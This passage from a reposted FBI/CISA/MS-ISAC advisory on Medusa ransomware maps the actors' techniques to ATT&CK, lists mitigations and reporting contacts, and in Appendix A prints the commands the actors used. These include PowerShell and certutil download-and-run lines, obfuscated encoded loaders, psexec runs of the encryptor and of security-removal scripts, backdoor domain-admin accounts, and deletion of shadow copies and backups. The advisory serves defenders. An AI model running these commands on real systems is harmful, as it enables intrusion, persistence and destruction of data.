<td><a href="https://attack.mitre.org/versions/v16/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a></td>
<td>Medusa actors used PowerShell, a powerful interactive command-line interface and scripting environment for ingress, network, and filesystem enumeration.</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: Windows Command Shell</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell ">T1059.003</a></td>
<td>Medusa actors used Windows Command Prompt—which can be used to control almost any aspect of a system—for ingress, network, and filesystem enumeration.&nbsp;</td>
</tr>
<tr>
<td>Software Deployment Tools</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1072/" title="Software Deployment Tools">T1072</a></td>
<td>Medusa Actors used&nbsp;PDQ Deploy and BigFix to deploy the encryptor on files across the network.</td>
</tr>
<tr>
<td>Remote Services: Remote Desktop Protocol</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol ">T1021.001</a></td>
<td>Medusa actors used Remote Desktop Protocol (RDP), a common feature in operating systems, to log into an interactive session with a system and move laterally.</td>
</tr>
<tr>
<td>System Services</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1569/002/" title="System Services ">T1569.002</a></td>
<td>Medusa actors used Sysinternals PsExec to deploy the encryptor on files across the network.</td>
</tr>
<tr>
<td>Windows Management Instrumentation</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1047/" title="Windows Management Instrumentation">T1047</a></td>
<td>Medusa actors abused Windows Management Instrumentation to query system information.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;8: Exfiltration and Encryption</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title&nbsp;</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exfiltration</td>
<td><a href="https://attack.mitre.org/versions/v16/tactics/TA0010/" title="Exfiltration ">TA0010</a></td>
<td>Medusa actors identified files to exfiltrate out of victim networks.</td>
</tr>
<tr>
<td>Exfiltration Over Web Service: Exfiltration to Cloud Storage</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a></td>
<td>Medusa actors used Rclone to facilitate exfiltration of data to the Medusa C2 servers.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 9: Command and Control</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ingress Tool Transfer</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1105/" title="Ingress Tool Transfer">T1105</a></td>
<td>Medusa actors used PowerShell, Windows Command Prompt, and certutil for file ingress.</td>
</tr>
<tr>
<td>Application Layer Protocol: Web Protocols&nbsp;</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols ">T1071.001</a></td>
<td>Medusa actors communicate using application layer protocols associated with web traffic. In this case, Medusa actors used scripts that created reverse or bind shells over port <code>443</code>: HTTPS.</td>
</tr>
<tr>
<td>Remote Access Software</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1219/" title="Remote Access Software ">T1219</a></td>
<td>Medusa actors used remote access software to move laterally through the network.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;10: Persistence</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Create Account</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1136/002/" title="Create Account">T1136.002</a></td>
<td>Medusa actors created a domain account to maintain access to victim systems.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;11: Impact</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Data Encrypted for Impact</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1486/" title="Data Encrypted for Impact ">T1486</a></td>
<td>Medusa identified and encrypted data on target systems to interrupt availability to system and network resources.</td>
</tr>
<tr>
<td>Inhibit System Recovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1490/" title="Inhibit System Recovery">T1490</a></td>
<td>The process&nbsp;<code>gaze.exe</code> terminates all services then deletes shadow copies and encrypts files with AES-256 before dropping the ransom note.</td>
</tr>
<tr>
<td>Financial Theft</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1657/" title="Financial Theft ">T1657</a></td>
<td>Victims must pay to decrypt files and prevent further release by Medusa actors.</td>
</tr>
<tr>
<td>System Shutdown/Reboot</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1529/" title="System Shutdown/Reboot">T1529</a></td>
<td>Medusa actors manually turned off and encrypted virtual machines.</td>
</tr>
<tr>
<td>Service Stop</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1489/" title="Service Stop">T1489</a></td>
<td>The process&nbsp;<code>gaze.exe</code> terminates all services related to backups, security, databases, communication, file sharing, and websites,</td>
</tr>
</tbody>
</table>
</div>
<h2><strong>Mitigations</strong></h2>
<p>FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity posture based on threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cpg" title="Cross-Sector Cybersecurity Performance Goals">CPGs webpage</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul>
<li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#NetworkSegmentation2F" title="Network Segmentation">CPG 2.F</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="System Backups">2.R</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#IncidentResponseIRPlans2S" title="Incident Response (IR) Plans">2.S</a>].</li>
<li><strong>Require all accounts</strong> with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards. In particular, require employees to use long passwords and consider not requiring frequently recurring password changes, as these can weaken security [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#UniqueCredentials2C" title="Unique Credentials">CPG 2.C</a>].</li>
<li><strong>Require multifactor authentication</strong> for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="Phishing-Resistant Multifactor Authentication (MFA)">CPG 2.H</a>].</li>
<li><strong>Keep all operating systems, software, and firmware up to date.</strong> Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#MitigatingKnownVulnerabilities1E" title="Mitigating Known Vulnerabilities ">CPG 1.E</a>].</li>
<li><strong>Segment networks</strong> to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#NetworkSegmentation2F" title="Network Segmentation">CPG 2.F</a>].</li>
<li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.</strong> To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DetectingRelevantThreatsandTTPs3A" title="Detecting Relevant Threats and TTPs">CPG 3.A</a>].</li>
<li><strong>Require VPNs or Jump Hosts for remote access.</strong></li>
<li><strong>Monitor for unauthorized scanning and access attempts.</strong></li>
<li><strong>Filter network traffic</strong> by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.</li>
<li><strong>Audit user accounts</strong> with administrative privileges and configure access controls according to the principle of least privilege [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SeparatingUserandPrivilegedAccounts2E" title="Separating User and Privileged Accounts">CPG 2.E</a>].</li>
<li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#AssetInventory1A" title="Asset Inventory">CPG 1.A</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DocumentDeviceConfigurations2O" title="Document Device Configurations">2.O</a>].</li>
<li><strong>Disable command-line and scripting activities and permissions.</strong> Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SeparatingUserandPrivilegedAccounts2E" title="Separating User and Privileged Accounts ">CPG 2.E</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DisableMacrosbyDefault2N" title="Disable Macros by Default">2.N</a>].</li>
<li><strong>Disable unused ports</strong>[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#ProhibitConnectionofUnauthorizedDevices2V" title="Prohibit Connection of Unauthorized Devices">CPG 2.V</a>].</li>
<li><strong>Maintain offline backups of data,</strong> and regularly maintain backup and restoration [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="System Backups">CPG 2.R</a>]. By instituting this practice, the organization helps ensure they will not be severely interrupted and/or only have irretrievable data.</li>
<li><strong>Ensure all backup data is encrypted, immutable</strong> (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#StrongandAgileEncryption2K" title="Strong and Agile Encryption ">CPG 2.K</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SecureSensitiveData2L" title="Secure Sensitive Data">2.L</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="System Backups">2.R</a>].</li>
</ul>
<h2><strong>Validate Security Controls</strong></h2>
<p>In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;CK Matrix for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (<strong>Table 3</strong> to <strong>Table 11</strong>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2><strong>Resources</strong></h2>
<ul>
<li>Joint <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide" title="#StopRansomware Guide">#StopRansomware Guide</a>.</li>
<li>Joint Guide <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living Off the Land Techniques">Identifying and Mitigating Living Off the Land Techniques</a>.</li>
<li>Joint <a href="https://www.cisa.gov/resources-tools/resources/guide-securing-remote-access-software" title="Guide to Securing Remote Access Software">Guide to Securing Remote Access Software</a>.</li>
</ul>
<h2><strong>Reporting</strong></h2>
<p>Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.</p>
<p>FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.</p>
<p>Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.</p>
<p>The FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents to FBI’s <a href="https://www.ic3.gov/Home/ComplaintChoice">Internet Crime Complaint Center (IC3)</a>, a <a href="https://www.fbi.gov/contact-us/field-offices">local FBI Field Office</a>, or CISA via the agency’s <a href="https://www.cisa.gov/report">Incident Reporting System</a> or its 24/7 Operations Center (<a href="mailto:report@cisa.gov">report@cisa.gov</a>) or by calling 1-844-Say-CISA (1-844-729-2472).</p>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and MS-ISAC.</p>
<h2><strong>Acknowledgements</strong></h2>
<p>ConnectWise contributed to this advisory.</p>
<h2><strong>Version History</strong></h2>
<p><strong>March 12, 2025:</strong> Initial version.</p>
<h2><strong>Appendix A:&nbsp;Medusa Commands</strong></h2>
<p>These commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold inside a victim network. Incident responders and threat hunters can use this information to detect malicious activity. System administrators can use this information to design allowlist/denylist policies or other protective mechanisms.</p>
<table>
<tbody>
<tr>
<td>cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.css &lt;localfile&gt;.dll</td>
</tr>
<tr>
<td>cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.msi &lt;localfile&gt;.msi</td>
</tr>
<tr>
<td>cmd.exe /c driverquery</td>
</tr>
<tr>
<td>cmd.exe /c echo Computer: %COMPUTERNAME% &amp; `<br />echo Username: %USERNAME% &amp; `<br />echo Domain: %USERDOMAIN% &amp; `<br />echo Logon Server: %LOGONSERVER% &amp; `<br />echo DNS Domain: %USERDNSDOMAIN% &amp; `<br />echo User Profile: %USERPROFILE% &amp; echo `<br />System Root: %SYSTEMROOT%</td>
</tr>
<tr>
<td>cmd.exe /c ipconfig /all&nbsp;[<a href="https://attack.mitre.org/versions/v16/techniques/T1016/" title="System Network Configuration Discovery">T1016</a>]</td>
</tr>
<tr>
<td>cmd.exe /c net share&nbsp;[<a href="https://attack.mitre.org/versions/v16/techniques/T1135/" title="Network Share Discovery">T1135</a>]</td>
</tr>
<tr>
<td>cmd.exe /c net use</td>
</tr>
<tr>
<td>cmd.exe /c netstat -a</td>
</tr>
<tr>
<td>cmd.exe /c sc query</td>
</tr>
<tr>
<td>cmd.exe /c schtasks</td>
</tr>
<tr>
<td>cmd.exe /c systeminfo&nbsp;[<a href="https://attack.mitre.org/versions/v16/techniques/T1082/" title="System Information Discovery">T1082</a>]</td>
</tr>
<tr>
<td>cmd.exe /c ver</td>
</tr>
<tr>
<td>cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname</td>
</tr>
<tr>
<td>cmd.exe /c wmic printjob</td>
</tr>
<tr>
<td>mmc.exe compmgmt.msc /computer:{hostname/ip}</td>
</tr>
<tr>
<td>mstsc.exe /v:{hostname/ip}</td>
</tr>
<tr>
<td>mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}</td>
</tr>
<tr>
<td>powershell -exec bypass -enc &lt;base64 encrypted command string&gt;</td>
</tr>
<tr>
<td>powershell -nop -c $x = &#8216;D&#8217; + &#8216;Own&#8217; + &#8216;LOa&#8217; + &#8216;DfI&#8217; + &#8216;le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RMM tool&gt;.msi)</td>
</tr>
<tr>
<td>
<p>powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create((</p>
<p>New-Object System.IO.StreamReader(</p>
<p>New-Object System.IO.Compression.GzipStream((</p>
<p>New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(</p>
<p>((&#8216;&lt;base64 payload string&gt;&#8217;)-f'&lt;character replacement 0&gt;&#8217;,</p>
<p>&#8216;&lt;character replacement 1&gt;&#8217;,'&lt;character replacement 2&gt;&#8217;)))),</p>
<p>[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</p>
</td>
</tr>
<tr>
<td>powershell Remove-Item (Get-PSReadlineOption).HistorySavePath</td>
</tr>
<tr>
<td>
<p>powershell Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate,</p>
<p>logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path &lt;file path&gt;&nbsp;</p>
<p>-NoTypeInformation -Encoding UTF8</p>
</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} &#8220;c:windowssystem32taskkill.exe&#8221; /f /im WRSA.exe</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -c coba.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -c openrdp.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -c StopAllProcess.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -c zam.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} c:tempx.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} cmd</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} cmd /c&nbsp; &nbsp;&#8220;c:gaze.exe&#8221;</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} cmd /c&nbsp; &#8220;copy ad02sysvolgaze.exe c:gaze.exe</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} cmd /c&nbsp; &#8220;copy ad02sysvolgaze.exe c:gaze.exe &amp;&amp; c:gaze.exe&#8221;</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} -c coba.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} -c openrdp.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} -c zam.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} cmd</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -u {user} -p {pass} -с newuser.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -с duooff.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -с hostname/ipwho.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -с newuser.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -с removesophos.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -с start.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s {hostname/ip} -с uninstallSophos.bat</td>
</tr>
<tr>
<td>nltest /dclist:</td>
</tr>
<tr>
<td>net group &#8220;domain admins&#8221; /domain&nbsp;[<a href="https://attack.mitre.org/versions/v16/techniques/T1069/002/" title="Permission Groups Discovery: Domain Groups">T1069.002</a>]</td>
</tr>
<tr>
<td>net group &#8220;Domain Admins&#8221; default /add /domain</td>
</tr>
<tr>
<td>net group &#8220;Enterprise Admins&#8221; default /add /domain</td>
</tr>
<tr>
<td>net group &#8220;Remote Desktop Users&#8221; default /add /domain</td>
</tr>
<tr>
<td>net group &#8220;Group Policy Creator Owners&#8221; default /add /domain</td>
</tr>
<tr>
<td>net group &#8220;Schema Admins&#8221; default /add /domain</td>
</tr>
<tr>
<td>net group &#8220;domain users&#8221; /domain</td>
</tr>
<tr>
<td>net user default /active:yes /domain</td>
</tr>
<tr>
<td>net user /add default &lt;password&gt; /domain&nbsp;[<a href="https://attack.mitre.org/versions/v16/techniques/T1136/002/" title="Create Account: Domain Account">T1136.002</a>]</td>
</tr>
<tr>
<td>query user</td>
</tr>
<tr>
<td>reg add HKLMSystemCurrentControlSetControlLsa /v DisableRestrictedAdmin /t REG_DWORD /d 0</td>
</tr>
<tr>
<td>systeminfo</td>
</tr>
<tr>
<td>vssadmin.exe Delete Shadows /all /quiet</td>
</tr>
<tr>
<td>vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded</td>
</tr>
<tr>
<td>del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.* %s*.set %s*.win %s*.dsk</td>
</tr>
<tr>
<td>netsh advfirewall firewall add rule name=&#8221;rdp&#8221; dir=in protocol=tcp localport=3389 action=allow</td>
</tr>
<tr>
<td>netsh advfirewall firewall set rule group=&#8221;windows management instrumentation (wmi)&#8221; new enable=yes</td>
</tr>
<tr>
<td>reg add &#8220;HKLMSYSTEMCurrentControlSetControlTerminal Server&#8221; /v fDenyTSConnections /t REG_DWORD /d 0 /f</td>
</tr>
</tbody>
</table>
</div>
</div>
<p>Source: US-CERT Alerts</p>
]]></content:encoded>
			<wfw:commentRss>http://disensogroup.com/stopransomware-medusa-ransomware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
